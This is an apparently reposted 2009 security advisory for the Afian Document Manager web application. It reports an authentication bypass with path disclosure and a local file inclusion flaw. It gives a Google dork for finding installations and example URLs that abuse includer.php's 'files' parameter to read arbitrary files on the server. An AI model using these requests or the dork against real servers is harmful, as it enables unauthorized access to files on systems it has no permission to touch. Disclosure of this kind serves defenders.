Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:21404
HistoryMar 02, 2009 - 12:00 a.m.

Afian Document Manager Local File Inclusion

2009-03-0200:00:00
vulners.com
26

Afian is an application that can add, in just minutes, powerful document management capabilities to any Web server. It
provides an Web-based interface for documents residing on the Web server's file system.

This software has a secutity hole allow attackers download any files if they know the path.

Vendor: afian.com
Vulnerabilities: Bypass + Fullpath Disclosure + Local File Inclusion.
Version: Unknown (maybe 2.x.x)
Demo: http://demo.afian.com

Exploit:
Google Dork: Afian document manager

  1. Bypass+Fullpath Disclosure:
    http://site/path/css/includer.php?files=NOT_EXIST_FILE
    It doesn't ask username/password and display fullpath.
  2. Local File Inclusion: Read any files if know exactly path_of_file
    http://site/path/css/includer.php?files=PATH_TO_FILE